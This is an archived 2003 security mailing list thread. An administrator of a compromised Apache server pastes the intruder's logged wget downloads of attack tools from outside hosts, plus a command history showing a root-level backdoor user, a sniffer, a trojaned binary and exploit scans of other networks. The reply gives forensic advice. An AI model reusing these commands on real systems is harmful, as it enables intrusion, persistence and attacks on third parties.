Mailinglist Archive: opensuse-security (334 mails)

< Previous Next >
Re: [suse-security] Apache Gain Remote Shell Access
UNPOLUG the network cable and reinstall the machine on other NEW HDD
(preserve the actual HDD for further forensic investigations) - but UNPLUG
IT NOW!!!!!


----- Original Message -----
From: "Marco Lum" <marco@xxxxxxxxxxxxx>
To: "suse-security" <suse-security@xxxxxxxx>
Sent: Wednesday, September 03, 2003 7:43 PM
Subject: [suse-security] Apache Gain Remote Shell Access


> Help, Help, Somebody help!!!
>
> I Found somebody gain access using wwwrun, Download programs and try to
> hack into other server.
>
> Follows found in error_log of apache
>
> --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
> => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
> 0K ......... 100%
> 13.69 KB/s
>
> 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
>
>
> bind: Address already in use
> bind: Address already in use
> --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz
> => `bin.tar.gz'
> Resolving geocities.com... done.
> Connecting to geocities.com[66.218.77.68]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,748 [application/x-gzip]
>
> 0K .......... ......... 100%
> 65.37 KB/s
>
> 09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
>
> sh: line 1: ./bin.tar.gz: Permission denied
>
> gzip: stdin: not in gzip format
> tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out
> => `a.out'
> Resolving 195.174.78.202... done.
> Connecting to 195.174.78.202:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 13,444 [text/plain]
>
> 0K .......... ... 100%
> 3.37 KB/s
>
> 15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
>
> sh: line 1: ./a.out: Permission denied
> chmod: invalid mode string: `x'
> sh: line 1: ./a.out: Permission denied
> Bad syntax, perhaps a bogus '-'?
>
> sh: line 1: cd: /tmp/vulturu: No such file or directory
> --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz
> => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
> 0K ......... 100%
> 13.67 KB/s
>
> 20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
>
>
> tar: Error exit delayed from previous errors
>
> sh: line 1: cd: /tmp/": No such file or directory
>
>
> Also Found his command history:
>
>
> id
> /usr/sbin/adduser vulturul -u0 -g0 -M;
> cd /usr/local/games/
> ls -ax
> wget www.vulturul.org/vulturul/bnc.tgz
> cd /tmp/" "
> socklist
> killall -9 nsl
> ls -ax
> rm -rf epcs2
> rm -rf ns
> rm -rf nsl
> rm -rf p
> rm -rf pk
> ls -ax
> wget www.vulturul.org/vulturul/bnc.tgz
> tar xvfz bnc.tgz
> mv psybnc "~. "
> cd "~. "
> mv psybnc " "
> export PATH=:PATH
> ./" "
> id
> ls --color
> ./li
> ls --color
> ./p
> exec ./p 8003
> id
> pwd
> cd ..
> cd ..
> ls -ax
> ls -ax --color
> rm -rf edu.gz
> rm -rf local.tar.gz
> rm -rf local
> cd 3du
> ls --colorls --color
> ./scan 200.13.230.37
> ./scan 200.13.230.37 -d 6
> ./scan 202.30.198.226 -d 6
> /scan 202.186.250.157
> ./scan
> ./scan 202.186.250.157
> ./scan 202.186.250.157 -d 6
> ./scan 64.106.104.84 -d 6
> ./scan 64.106.104.84 -d 6
> ./scan 128.119.213.136 -d 2
> d ..
> cd ..
> ls -ax
> cd atd
> ls -ax
> ./osslmass2 mass.log
> ./osslmass2 mass.log
> cd ../atd
> ls -ax
> cd ..
> ls -ax --color
> pico
> ./pico
> mv pico /usr/bin
> pico
> ls -ax
> mv pico /usr/bin
> cp pico /usr/bin/pico
> cd 3du
> ls -ax --color
> cd ..
> wget http://geocities.com/supers7ar/boom.tar.gz
> tar xvfz boom.tar.gz
> cd boom
> ls -ax
> ./r00t./r00t -t 193.231.142 -d 3
> ./r00t -t 193.231.142 -d 2
> ./r00t -t 193.231.142 -d 4
> ./r00t -t 193.231.142 -d 7
> ./r00t -t 193.231.142 -d 8
> cd ..
> pwd
> wget http://geocities.com/supers7ar/sshup.tar.gz
> tar xvfz sshup.tar.gz
> cd ssh-3.0.1/
> ls -ax
> cd ..
> rm -rf ssh-3.0.1/
> rm -rf sshup.tar.gz
> ls -ax --color
> rm -rf boom.tar.gz
> cd ~.
> cd " ~.
>
> q
>
> q
>
> }
>
> q
>
> exit
>
> ls -ax
> wget www.vulturul.org/vulturul/linsniffer
> chmod +x linsniffer
> ./linsniffer
> ls -ax
> rm -rf linsniffer
> ls -ax --color
> id
> ./heh
>
> ./r00t -t 128.100.20 -d 8
> ./r00t -t 193.231.142 -d 3
> ./r00t -t 193.231.142 -d 2
>
> ./scan 200.13.230.37
>
> Please help, I Can't found where he can get in~~!
>
> --
> Marco Lum
> Net Service Manager
>
>
____________________________________________________________________________
_______________
> System Development Service
> Inter/Intra/Local-Area Networking Service
>
> VOICE: +852 2851 1190
> FAX : +852 2851 1109
> Email: enquiry@xxxxxxxxxxxxx
> WWWeb: http://www.hkservice.com
>
> HK Service Company
> HK Service Consultants Limited
>
>
>
>
> --
> Check the headers for your unsubscription address
> For additional commands, e-mail: suse-security-help@xxxxxxxx
> Security-related bug reports go to security@xxxxxxx, not here
>
>



< Previous Next >
References